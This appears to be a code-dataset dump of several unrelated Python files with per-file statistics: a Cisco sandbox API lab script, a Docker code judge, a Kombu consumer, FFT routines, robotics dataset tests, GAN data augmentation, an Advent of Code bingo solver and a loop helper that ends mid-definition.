user_id = '86847897-ab35-489c-af17-6fbf301a6016'
access_token = '0f493c98-9689-37c4-ad76-b957020d0d6c'
#Define the required GET Headers needed by the CKC API
headers = {
'authorization': "Bearer " + access_token,
'Content-Type': "application/json"
}
#The URL with queryParms to request user details
requestUrl = 'https://ckcsandbox.cisco.com/t/devnet.com/cdp/v1/locations/user/' + user_id + '/info'
print('\nGetting User Location Info: (' + requestUrl + ')\n')
# create the request
request = urllib.request.Request(requestUrl, headers = headers)
# perform the request
response = urllib.request.urlopen(request)
results = response.read().decode(encoding)
responseDictionary = json.loads(results)
print('User Location Info:', results, '\n')
############################### LEARNING LAB 2 PART-2 ############################
#
# In this example, we will exercise the CKC API: {{Platform Instance URL}}/cdp/v1/capabilities/customer
# In the case of the Sandbox lab, this resolves to https://ckcsandbox.cisco.com/t/devnet.com/cdp/v1/capabilities/customer
# The access_token obtained as explained in Learning Lab 1 is used for authorization
#Define the required GET Headers needed by the CKC API
headers = {'authorization': "Bearer " + access_token }
#The URL with queryParms to request user details
requestUrl = 'https://ckcsandbox.cisco.com/t/devnet.com/cdp/v1/capabilities/customer'
print('\nGetting User capabilities: (' + requestUrl + ')\n')
# create the request
request = urllib.request.Request(requestUrl, headers = headers)
# perform the request
response = urllib.request.urlopen(request)
results = response.read().decode(encoding)
responseDictionary = json.loads(results)
print('User Capabilities:', results, '\n')
| 37.289855 | 128 | 0.724835 | 350 | 2,573 | 5.285714 | 0.342857 | 0.047568 | 0.032432 | 0.04973 | 0.634054 | 0.634054 | 0.588108 | 0.588108 | 0.588108 | 0.588108 | 0 | 0.027196 | 0.128255 | 2,573 | 68 | 129 | 37.838235 | 0.797593 | 0.465604 | 0 | 0.333333 | 0 | 0.083333 | 0.335223 | 0.0583 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.041667 | 0 | 0.041667 | 0.208333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e7d265dcc13b68469fdea2d8131380b85fbb3c6 | 4,780 | py | Python | judge/machine.py | Means88/judge-backend | 6e998ebb145911e66f8baec6568f007082835a61 | [
"MIT"
] | null | null | null | judge/machine.py | Means88/judge-backend | 6e998ebb145911e66f8baec6568f007082835a61 | [
"MIT"
] | 3 | 2020-06-05T19:21:25.000Z | 2021-06-10T20:54:22.000Z | judge/machine.py | Means88/judge-backend | 6e998ebb145911e66f8baec6568f007082835a61 | [
"MIT"
] | null | null | null | import json
import uuid
import os
import docker
import time
from celery.utils.log import get_task_logger
from config import settings
from .language import LANGUAGE
from .status import ComputingStatus
logger = get_task_logger(__name__)
class Machine:
client = docker.from_env()
def __init__(self):
self.container = None
self.src_path = None
self.stdout_path = None
self.output_path = None
self.start_time = None # s
self.time_limit = None # ms
self.memory_limit = None # byte
self.uuid = str(uuid.uuid4())
self.temp_file_path = os.path.join(settings.BASE_DIR, 'tmp', self.uuid + '.log')
f = open(self.temp_file_path, 'w')
f.write('')
f.close()
self.status = ComputingStatus.PENDING
def create(self, language,
src_path, stdin_path, output_path, error_path,
time_limit=1000, memory_limit=256 * 1024 * 1024):
if self.container:
raise Exception('Container already exist')
self.src_path = src_path
self.output_path = output_path
self.time_limit = time_limit
self.memory_limit = memory_limit
self.container = self.client.containers.create(
LANGUAGE.get_image_name(language),
volumes={
src_path: {'bind': '/judge/{}'.format(LANGUAGE.get_source_name(language)), 'mode': 'ro'},
stdin_path: {'bind': '/judge/stdin', 'mode': 'ro'},
# stdout_path: {'bind': '/judge/stdout', 'mode': 'ro'},
output_path: {'bind': '/judge/userout', 'mode': 'rw'},
error_path: {'bind': '/judge/usererr', 'mode': 'rw'},
self.temp_file_path: {'bind': '/judge/return', 'mode': 'rw'}
},
mem_limit=int(memory_limit / 0.95),
memswap_limit=int(memory_limit / 0.95),
oom_kill_disable=True,
)
def start(self):
self.start_time = time.time()
self.container.start()
def stats(self):
return self.container.stats(decode=True, stream=False)
def container_status(self):
self.container.reload()
return self.container.status
def _wait_for_computing(self):
cpu_usage = 0
memory_usage = 0
logger.debug('judge machine compute: %s' % self.src_path)
logger.debug('time_limit: %s', self.time_limit)
for stats in self.container.stats(decode=True):
time_used = time.time() - self.start_time
cpu_usage = max(cpu_usage, time_used / 2 * 1000)
logger.debug('time_used: %s', time_used)
logger.debug('cpu_usage: %s', cpu_usage)
# stats = self.stats()
logger.debug(json.dumps(stats, indent=2, sort_keys=True))
if self.container_status() == 'exited':
self.status = ComputingStatus.FINISHED
break
cpu_usage = max(cpu_usage, stats['cpu_stats']['cpu_usage']['total_usage'] / 1e6)
logger.debug('time_limit : %s' % self.time_limit)
logger.debug('cpu_usage : %s' % cpu_usage)
memory_usage = max(memory_usage, stats['memory_stats'].get('max_usage', 0))
if cpu_usage > self.time_limit:
self.status = ComputingStatus.TIME_LIMIT_EXCEED
break
logger.debug('memory_limit: %s' % self.memory_limit)
logger.debug('memory_usage: %s' % memory_usage)
if memory_usage >= self.memory_limit:
self.status = ComputingStatus.MEMORY_LIMIT_EXCEED
break
if time_used > self.time_limit * 2 / 1000:
self.status = ComputingStatus.TIME_LIMIT_EXCEED
self.container.stop(timeout=0)
break
time.sleep(0.5)
try:
result = json.load(open(self.temp_file_path, mode='r'))
except:
result = None
return {
'status': self.status,
'cpu_usage': cpu_usage,
'memory_usage': memory_usage,
'output': open(self.output_path, mode='r'),
'result': result,
}
def wait_for_computing(self):
try:
return self._wait_for_computing()
except Exception as e:
logger.error(e)
return {
'status': ComputingStatus.ERROR,
'cpu_usage': 0,
'memory_usage': 0,
'output': None,
'result': None,
}
finally:
self.destroy()
def destroy(self):
if self.container:
self.container.stop(timeout=0)
self.container.remove()
self.container = None
| 32.965517 | 105 | 0.565063 | 549 | 4,780 | 4.703097 | 0.227687 | 0.070488 | 0.030209 | 0.024787 | 0.201394 | 0.112316 | 0.048025 | 0.026336 | 0 | 0 | 0 | 0.013543 | 0.320293 | 4,780 | 144 | 106 | 33.194444 | 0.781163 | 0.017573 | 0 | 0.136752 | 0 | 0 | 0.086354 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068376 | false | 0 | 0.076923 | 0.008547 | 0.205128 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e7edf92edac4cf5b0a634e3bcb329f30e6b8e66 | 2,160 | py | Python | sources/classic/messaging_kombu/consumer.py | variasov/classic_messaging_kombu | c4191f3d1f788a39f50dc137eca1b67f3ee2af20 | [
"MIT"
] | 1 | 2021-11-12T08:19:53.000Z | 2021-11-12T08:19:53.000Z | sources/classic/messaging_kombu/consumer.py | variasov/classic_messaging_kombu | c4191f3d1f788a39f50dc137eca1b67f3ee2af20 | [
"MIT"
] | null | null | null | sources/classic/messaging_kombu/consumer.py | variasov/classic_messaging_kombu | c4191f3d1f788a39f50dc137eca1b67f3ee2af20 | [
"MIT"
] | null | null | null | from functools import partial
import logging
from typing import Callable, Any, Iterable
from collections import defaultdict
from kombu import Connection
from kombu.mixins import ConsumerMixin
from classic.components import component
from .handlers import MessageHandler, SimpleMessageHandler
from .scheme import BrokerScheme
logger = logging.getLogger(__file__)
AnyCallable = Callable[[Any], None]
@component
class KombuConsumer(ConsumerMixin):
connection: Connection
scheme: BrokerScheme
def __attrs_post_init__(self):
self._handlers = defaultdict(list)
def _get_queues(self, queue_names: Iterable[str]):
queues = []
for name in queue_names:
assert name in self.scheme.queues, \
f'Queue with name {name} do not exists in broker scheme!'
queues.append(self.scheme.queues[name])
return queues
def register_handler(self, handler: MessageHandler, *queue_names: str):
queues = self._get_queues(queue_names)
self._handlers[handler].extend(queues)
def register_function(self,
function: AnyCallable,
*queue_names: str,
late_ack: bool = True):
handler = SimpleMessageHandler(
function=function, late_ack=late_ack,
)
queues = self._get_queues(queue_names)
self._handlers[handler].extend(queues)
def get_consumers(self, consumer_cls, channel):
consumers = []
for handler, queues in self._handlers.items():
on_message = partial(self.on_message, handler=handler)
c = consumer_cls(
queues=queues,
callbacks=[on_message],
)
consumers.append(c)
return consumers
@staticmethod
def on_message(body, message, handler):
try:
logger.info(f'Trying to call {handler}')
handler.handle(message, body)
except Exception as error:
logger.error(error)
def run(self, *args, **kwargs):
logger.info('Worker started')
return super().run(*args, **kwargs)
| 29.589041 | 75 | 0.6375 | 231 | 2,160 | 5.796537 | 0.380952 | 0.04481 | 0.023898 | 0.028379 | 0.0941 | 0.0941 | 0.0941 | 0.0941 | 0.0941 | 0.0941 | 0 | 0 | 0.27963 | 2,160 | 72 | 76 | 30 | 0.86054 | 0 | 0 | 0.071429 | 0 | 0 | 0.042593 | 0 | 0 | 0 | 0 | 0 | 0.017857 | 1 | 0.125 | false | 0 | 0.160714 | 0 | 0.392857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e7ff2193d4240f5f73671b8a5f9d6d5555d5513 | 2,004 | py | Python | du4/du4.py | Honzaik/PocAlgDU | a3d32d1906298ba4bc1627640ecc04370ff4e49c | [
"Unlicense"
] | null | null | null | du4/du4.py | Honzaik/PocAlgDU | a3d32d1906298ba4bc1627640ecc04370ff4e49c | [
"Unlicense"
] | null | null | null | du4/du4.py | Honzaik/PocAlgDU | a3d32d1906298ba4bc1627640ecc04370ff4e49c | [
"Unlicense"
] | null | null | null | from cmath import exp, pi
from math import log2
def vratLiche(a):
oddA = list();
for i in range(len(a)):
if(i % 2 == 1):
oddA.append(a[i])
return oddA
def vratSude(a):
evenA = list()
for i in range(len(a)):
if(i % 2 == 0):
evenA.append(a[i])
return evenA
def roundComplex(vysl): #zaokrouhlování
newVysl = list()
for v in vysl:
a = round(v.real,5)
b = round(v.imag,5)
newVysl.append(complex(a,b))
return newVysl
def recursiveComplexFFT(n, prim, a):
if(n == 1):
return [a[0]]
else:
nHalf = int(n/2)
newPrim = prim*prim
b = recursiveComplexFFT(nHalf, newPrim, vratSude(a))
c = recursiveComplexFFT(nHalf, newPrim, vratLiche(a))
result = [0]*int(n)
for i in range(nHalf):
tempPrim = prim**i
result[i] = b[i]+(tempPrim)*c[i]
result[nHalf+i] = b[i]-(tempPrim)*c[i]
return roundComplex(result)
def rev(i,k): #rev funkce
mask = '{0:0' + str(k) + 'b}'
return int(mask.format(i)[::-1],2)
def iterativeComplexFFT(n, prim, a):
k = int(log2(n))
A = [0]*n
for i in range(n):
A[i] = a[rev(i,k)]
prims = [0]*k
prims[k-1] = prim
for i in range(k-2,-1,-1):
prims[i] = prims[i+1]*prims[i+1]
for u in range(1,k+1,1):
m = 2**u
for i in range(0, n-m+1, m):
for j in range(0,int(m/2),1):
temp = (prims[u-1]**j)*A[i+j+int(m/2)]
v1 = A[i+j] + temp
v2 = A[i+j] - temp
A[i+j] = v1
A[i+j+int(m/2)] = v2
return roundComplex(A)
vektor = [1,1,2,2,5,2,4,7] #pocitani vektor
n = len(vektor)
myPrim = exp((2j*pi)/n) #primitivni odmocnina
res = recursiveComplexFFT(n, myPrim, vektor) #rekurzivni fft
print(res)
myPrim = exp((2j*pi)/n)
res2 = iterativeComplexFFT(n, myPrim, vektor) #iterativni fft
print(res2) | 27.833333 | 65 | 0.510978 | 312 | 2,004 | 3.282051 | 0.237179 | 0.054688 | 0.035156 | 0.064453 | 0.136719 | 0.085938 | 0.044922 | 0.044922 | 0.044922 | 0.044922 | 0 | 0.038405 | 0.324351 | 2,004 | 72 | 66 | 27.833333 | 0.717873 | 0.043912 | 0 | 0.061538 | 0 | 0 | 0.00314 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.092308 | false | 0 | 0.030769 | 0 | 0.230769 | 0.030769 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e85f751c8a5501a2b056c1fde74847efffec00d | 4,147 | py | Python | tests/test_cv.py | goyoambrosio/RobotAtHome2 | 9ab31e5e11d8551b9f6934d90245221449dbbbf4 | [
"MIT"
] | 1 | 2022-03-08T19:00:37.000Z | 2022-03-08T19:00:37.000Z | tests/test_cv.py | goyoambrosio/RobotAtHome2 | 9ab31e5e11d8551b9f6934d90245221449dbbbf4 | [
"MIT"
] | null | null | null | tests/test_cv.py | goyoambrosio/RobotAtHome2 | 9ab31e5e11d8551b9f6934d90245221449dbbbf4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8; buffer-read-only: t -*-
__author__ = "Gregorio Ambrosio"
__contact__ = "gambrosio[at]uma.es"
__copyright__ = "Copyright 2021, Gregorio Ambrosio"
__date__ = "2021/02/22"
__license__ = "MIT"
import unittest
import os
import sys
import pandas as pd
import matplotlib.pyplot as plt
import robotathome as rh
from robotathome import logger, set_log_level
class Test(unittest.TestCase):
"""Test class of toolbox module """
# @unittest.skip("testing skipping")
def setUp(self):
""" The setUp() method allow you to define instructions that will be
executed before and after each test method
Examples:
python -m unittest <testModule>.<className>.<function_name>
$ cd ~/cloud/GIT/RobotAtHome_API/tests
$ python -m unittest test_reader.Test.test_get_home_names
"""
# we are testing: set the lowest log level
rh.set_log_level('TRACE')
logger.trace("*** Test.setUp")
# Local references
'''
/home/user
└─── WORKSPACE
├─── R@H2-2.0.1
│ └── files
│ ├── rgbd
│ └── scene
└─────── rh.db
'''
self.rh_path = os.path.expanduser('~/WORKSPACE/R@H2-2.0.1')
self.wspc_path = os.path.expanduser('~/WORKSPACE')
self.rgbd_path = os.path.join(self.rh_path, 'files/rgbd')
self.scene_path = os.path.join(self.rh_path, 'files/scene')
self.db_filename = 'rh.db'
try:
self.rh = rh.RobotAtHome(rh_path = self.rh_path,
rgbd_path = self.rgbd_path,
scene_path = self.scene_path,
wspc_path = self.wspc_path,
db_filename = self.db_filename
)
except:
logger.error("setUp: something was wrong")
# exit without handling
os._exit(1)
def tearDown(self):
"""The tearDown() method allow you to define instructions that will be
executed after each test method"""
logger.trace("*** Test.tearDown")
del self.rh
def test_say_hello(self):
"""Testing of say_hello
"""
logger.trace("*** Testing of say_hello()")
logger.info("Running say_hello in _greetings.py")
logger.info(rh.say_hello())
def test_get_labeled_img(self):
"""Testing of get_labeled_img
"""
logger.trace("*** Testing of get_labeled_img()")
logger.info("Getting labeled image")
id = 100000 # 100000 <= id < 200000
[rgb_f, _] = self.rh.get_RGBD_files(id)
labels = self.rh.get_RGBD_labels(id)
[labeled_img, _] = rh.get_labeled_img(labels, rgb_f)
plt.imshow(labeled_img)
plt.show()
def test_plot_labeled_img(self):
"""Testing of plot_labels
"""
logger.trace("*** Testing of plot_labeled_img()")
logger.info("Plotting RGB image patched with labels")
set_log_level('INFO')
id = 100000 # 100000 <= id < 200000
[rgb_f, _] = self.rh.get_RGBD_files(id)
labels = self.rh.get_RGBD_labels(id)
logger.info("\nlabel names: \n{}", labels['name'])
logger.info("\nlabel masks type: \n{}", type(labels['mask'].iat[0]))
rh.plot_labeled_img(labels, rgb_f)
def test_get_scan_xy(self):
""" Docstring
"""
id = 200000 # 0 <= id <= inf
laser_scan = self.rh.get_laser_scan(id)
xy = rh.get_scan_xy(laser_scan)
print(xy)
def test_plot_scan(self):
""" Docstring
"""
id = 200000 # 0 <= id <= inf
laser_scan = self.rh.get_laser_scan(id)
rh.plot_scan(laser_scan)
def test_plot_scene(self):
scenes = self.rh.get_scenes()
s_id = 0
logger.info("\nScene file: \n{}", scenes.iloc[s_id].scene_file)
rh.plot_scene(scenes.iloc[s_id].scene_file)
if __name__ == '__main__':
unittest.main()
| 30.947761 | 78 | 0.564022 | 521 | 4,147 | 4.305182 | 0.318618 | 0.034775 | 0.028087 | 0.023183 | 0.317878 | 0.231832 | 0.187249 | 0.187249 | 0.161391 | 0.161391 | 0 | 0.025965 | 0.312756 | 4,147 | 133 | 79 | 31.180451 | 0.751228 | 0.196528 | 0 | 0.136986 | 0 | 0 | 0.155533 | 0.007311 | 0 | 0 | 0 | 0 | 0 | 1 | 0.109589 | false | 0 | 0.09589 | 0 | 0.219178 | 0.013699 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e8737e7bdcd75430db3502155a2cb8e2ea47372 | 4,483 | py | Python | third_party/DiffAugment_pytorch.py | SuperStar0907/lecam-gan | e502c9b182345ddd03d29edda56b76caa7d8fb41 | [
"Apache-2.0"
] | 135 | 2021-03-23T23:07:47.000Z | 2022-03-30T03:08:42.000Z | third_party/DiffAugment_pytorch.py | SuperStar0907/lecam-gan | e502c9b182345ddd03d29edda56b76caa7d8fb41 | [
"Apache-2.0"
] | 12 | 2021-04-06T16:57:14.000Z | 2021-12-31T07:06:05.000Z | third_party/DiffAugment_pytorch.py | SuperStar0907/lecam-gan | e502c9b182345ddd03d29edda56b76caa7d8fb41 | [
"Apache-2.0"
] | 13 | 2021-03-24T14:37:48.000Z | 2022-03-06T13:24:52.000Z | # Differentiable Augmentation for Data-Efficient GAN Training
# Shengyu Zhao, Zhijian Liu, Ji Lin, Jun-Yan Zhu, and Song Han
# https://arxiv.org/pdf/2006.10738
import torch
import torch.nn.functional as F
from torch.distributions.dirichlet import _Dirichlet
def BetaSample(alpha, beta, sample_shape=torch.Size()):
concentration = torch.stack([alpha, beta], -1)
shape = sample_shape + concentration.shape[:-1] + concentration.shape[-1:]
concentration = concentration.expand(shape)
return _Dirichlet.apply(concentration).select(-1, 0)
def DiffAugment(x, policy='', channels_first=True):
if policy:
x_ori = x.clone()
if not channels_first:
x = x.permute(0, 3, 1, 2)
for p in policy.split(','):
if p in list(AUGMENT_FNS.keys()):
for f in AUGMENT_FNS[p]:
x = f(x)
if not channels_first:
x = x.permute(0, 2, 3, 1)
x = x.contiguous()
# mixup
if 'mixup' in policy:
if not channels_first:
x1 = x_ori.permute(0, 3, 1, 2)
else:
x1 = x_ori.clone()
for p in policy.split(','):
if p in list(AUGMENT_FNS.keys()):
for f in AUGMENT_FNS[p]:
x1 = f(x1)
if not channels_first:
x1 = x1.permute(0, 2, 3, 1)
x1 = x1.contiguous()
#TODO
alpha = torch.ones(x.size(0), 1, 1, 1, dtype=x.dtype, device=x.device)*0.1
beta = torch.ones(x.size(0), 1, 1, 1, dtype=x.dtype, device=x.device)*0.1
weight = BetaSample(alpha, beta)
x = (1 - weight)*x1 + weight*x
'''weight = torch.distributions.beta.Beta(alpha, beta).sample()
weight = torch.max(weight, 1 - weight)
x = (1 - weight)*x_ori + weight*x'''
return x
def rand_brightness(x):
x = x + (torch.rand(x.size(0), 1, 1, 1, dtype=x.dtype, device=x.device) - 0.5)
return x
def rand_saturation(x):
x_mean = x.mean(dim=1, keepdim=True)
x = (x - x_mean) * (torch.rand(x.size(0), 1, 1, 1, dtype=x.dtype, device=x.device) * 2) + x_mean
return x
def rand_contrast(x):
x_mean = x.mean(dim=[1, 2, 3], keepdim=True)
x = (x - x_mean) * (torch.rand(x.size(0), 1, 1, 1, dtype=x.dtype, device=x.device) + 0.5) + x_mean
return x
def rand_translation(x, ratio=0.125):
shift_x, shift_y = int(x.size(2) * ratio + 0.5), int(x.size(3) * ratio + 0.5)
translation_x = torch.randint(-shift_x, shift_x + 1, size=[x.size(0), 1, 1], device=x.device)
translation_y = torch.randint(-shift_y, shift_y + 1, size=[x.size(0), 1, 1], device=x.device)
grid_batch, grid_x, grid_y = torch.meshgrid(
torch.arange(x.size(0), dtype=torch.long, device=x.device),
torch.arange(x.size(2), dtype=torch.long, device=x.device),
torch.arange(x.size(3), dtype=torch.long, device=x.device),
)
grid_x = torch.clamp(grid_x + translation_x + 1, 0, x.size(2) + 1)
grid_y = torch.clamp(grid_y + translation_y + 1, 0, x.size(3) + 1)
x_pad = F.pad(x, [1, 1, 1, 1, 0, 0, 0, 0])
x = x_pad.permute(0, 2, 3, 1).contiguous()[grid_batch, grid_x, grid_y].permute(0, 3, 1, 2)
return x
def rand_cutout(x, ratio=0.5):
cutout_size = int(x.size(2) * ratio + 0.5), int(x.size(3) * ratio + 0.5)
offset_x = torch.randint(0, x.size(2) + (1 - cutout_size[0] % 2), size=[x.size(0), 1, 1], device=x.device)
offset_y = torch.randint(0, x.size(3) + (1 - cutout_size[1] % 2), size=[x.size(0), 1, 1], device=x.device)
grid_batch, grid_x, grid_y = torch.meshgrid(
torch.arange(x.size(0), dtype=torch.long, device=x.device),
torch.arange(cutout_size[0], dtype=torch.long, device=x.device),
torch.arange(cutout_size[1], dtype=torch.long, device=x.device),
)
grid_x = torch.clamp(grid_x + offset_x - cutout_size[0] // 2, min=0, max=x.size(2) - 1)
grid_y = torch.clamp(grid_y + offset_y - cutout_size[1] // 2, min=0, max=x.size(3) - 1)
mask = torch.ones(x.size(0), x.size(2), x.size(3), dtype=x.dtype, device=x.device)
mask[grid_batch, grid_x, grid_y] = 0
x = x * mask.unsqueeze(1)
return x
def noise(x, sd=0.05):
x = x + torch.randn_like(x)*sd*sd
return x
AUGMENT_FNS = {
'color': [rand_brightness, rand_saturation, rand_contrast],
'translation': [rand_translation],
'cutout': [rand_cutout],
'noise': [noise],
}
| 39.672566 | 110 | 0.586438 | 731 | 4,483 | 3.48974 | 0.153215 | 0.05096 | 0.081537 | 0.024696 | 0.519796 | 0.459428 | 0.411995 | 0.400235 | 0.378283 | 0.378283 | 0 | 0.049063 | 0.249833 | 4,483 | 112 | 111 | 40.026786 | 0.709486 | 0.03636 | 0 | 0.244186 | 0 | 0 | 0.008193 | 0 | 0 | 0 | 0 | 0.008929 | 0 | 1 | 0.093023 | false | 0 | 0.034884 | 0 | 0.22093 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e8a1596a6b3ed1679875e09d7a25bdcda290e69 | 3,000 | py | Python | advent_of_code_2021/day4/giant_squid.py | mortendaehli/advent-of-code-2021 | b36959eeff461d1d9eb8bf32c1efc767f6f00b23 | [
"MIT"
] | null | null | null | advent_of_code_2021/day4/giant_squid.py | mortendaehli/advent-of-code-2021 | b36959eeff461d1d9eb8bf32c1efc767f6f00b23 | [
"MIT"
] | null | null | null | advent_of_code_2021/day4/giant_squid.py | mortendaehli/advent-of-code-2021 | b36959eeff461d1d9eb8bf32c1efc767f6f00b23 | [
"MIT"
] | null | null | null | import re
from dataclasses import dataclass
from typing import List, Optional
@dataclass
class PlayBoard:
numbers: List[List[Optional[int]]]
def read_numbers() -> List[int]:
with open("data.txt", "r") as file:
data = file.readline()
return list(map(int, data.split(",")))
def read_boards() -> List[PlayBoard]:
"""
Reading each board defined by a new line then 5 lists of 5 ints.
Given the data format, this divides equally by 6 for possible performant mapping.
"""
with open("data.txt", "r") as file:
data = file.readlines()[2:]
cleaned_data = list(map(lambda x: re.split("\s+", x.strip()), data)) # noqa
play_boards: List[PlayBoard] = list()
for i in range(0, len(data), 6):
play_boards.append(PlayBoard(numbers=[list(map(int, x)) for x in cleaned_data[i : i + 5]]))
return play_boards
def calculate_final_score(play_board: PlayBoard, number: int) -> int:
"""Sum remaining values on the play board."""
return sum([sum([val for val in row if val]) for row in play_board.numbers]) * number
def check_board_and_return_optional_score(play_board: PlayBoard, number: int) -> Optional[int]:
# Check rows
for row_num, row in enumerate(play_board.numbers):
if number in row:
row[row.index(number)] = None
if row == [None] * 5:
final_score = calculate_final_score(play_board=play_board, number=number)
return final_score
# check cols
for n in range(5):
col = [x[n] for x in play_board.numbers]
if col == [None] * 5:
final_score = calculate_final_score(play_board=play_board, number=number)
return final_score
else:
return None
def part_one() -> int:
numbers, play_boards = read_numbers(), read_boards()
game_results = list()
for number in numbers:
for play_board in play_boards:
score = check_board_and_return_optional_score(play_board=play_board, number=number)
if score:
game_results.append(score)
return game_results[0]
def part_two() -> int:
numbers, play_boards = read_numbers(), read_boards()
game_results = list()
for number in numbers:
for play_board in play_boards:
score = check_board_and_return_optional_score(play_board=play_board, number=number)
if score:
game_results.append(score)
return game_results[-1]
if __name__ == "__main__":
print("Day 4: Giant Squid")
print("-" * 80)
result_part_1 = part_one()
print(
f"Part 1: To guarantee victory against the giant squid, figure out which board will win first. "
f"What will your final score be if you choose that board?: {result_part_1}"
)
print("-" * 80)
result_part_2 = part_two()
print(
f"Part 2: Figure out which board will win last. Once it wins, what would its final score be?: {result_part_2}"
)
print("-" * 80)
| 30.30303 | 118 | 0.640333 | 426 | 3,000 | 4.316901 | 0.293427 | 0.078303 | 0.045677 | 0.039152 | 0.434475 | 0.426862 | 0.371398 | 0.371398 | 0.349103 | 0.316476 | 0 | 0.011146 | 0.252333 | 3,000 | 98 | 119 | 30.612245 | 0.808738 | 0.071333 | 0 | 0.378788 | 0 | 0.015152 | 0.117071 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.045455 | 0 | 0.287879 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e8ac78399e840a9f4584fc74b5d093c38c0fc44 | 265 | py | Python | lastrender/settings.py | jc855/lastgraph | a2917e73f0e0b9409e897e4a83944e72161a33ce | [
"BSD-3-Clause"
] | 77 | 2015-01-03T20:26:28.000Z | 2021-07-07T15:08:25.000Z | lastrender/settings.py | jc855/lastgraph | a2917e73f0e0b9409e897e4a83944e72161a33ce | [
"BSD-3-Clause"
] | 1 | 2021-06-10T23:42:31.000Z | 2021-06-10T23:42:31.000Z | lastrender/settings.py | jc855/lastgraph | a2917e73f0e0b9409e897e4a83944e72161a33ce | [
"BSD-3-Clause"
] | 20 | 2015-01-17T16:33:41.000Z | 2021-12-23T03:40:36.000Z | import os
static_path = os.path.join(os.path.dirname(__file__), "..", "static")
apiurl = "http://localhost:8000/api/%s"
local_store = os.path.join(static_path, "graphs")
local_store_url = "http://localhost:8000/static/graphs"
nodename = "lg"
nodepwd = "lg@home"
| 24.090909 | 69 | 0.709434 | 39 | 265 | 4.589744 | 0.538462 | 0.100559 | 0.111732 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033473 | 0.098113 | 265 | 10 | 70 | 26.5 | 0.715481 | 0 | 0 | 0 | 0 | 0 | 0.324528 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e8b609df5d78fd1e3a458dac9a51ed8f9a19335 | 952 | py | Python | src/omnis/structure_nodes/loop.py | rodrigogomesantos/omnis | a6f59c870d86c112f26a5b98c31889d64eea39eb | [
"MIT"
] | null | null | null | src/omnis/structure_nodes/loop.py | rodrigogomesantos/omnis | a6f59c870d86c112f26a5b98c31889d64eea39eb | [
"MIT"
] | null | null | null | src/omnis/structure_nodes/loop.py | rodrigogomesantos/omnis | a6f59c870d86c112f26a5b98c31889d64eea39eb | [
"MIT"
] | null | null | null | class loop():
def __init__(self, _loop_type, **kwargs) -> None:
self.type = _loop_type
self.kwargs = kwargs
self.break_function = self.kwargs.get("break_function")
self.range = kwargs.get("range")
self.start = getattr(self, f"_{self.type}")
self.counter = 0
self.outPut_function = 0
def _while(self, function, *ags, **kws):
while not self.break_function():
self.counter = 0
while not self.pause_function():
self.outPut_function = function(*ags, **kws)
self.counter+=1
return self.counter, self.outPut_function
def _for(self, function, *args, **kwargs):
self.counter = 0
for _c_ in self.range:
self.outPut_function = function(*args, **kwargs)
self.counter = _c_
return self.counter, self.outPut_function
def break_verify(self):
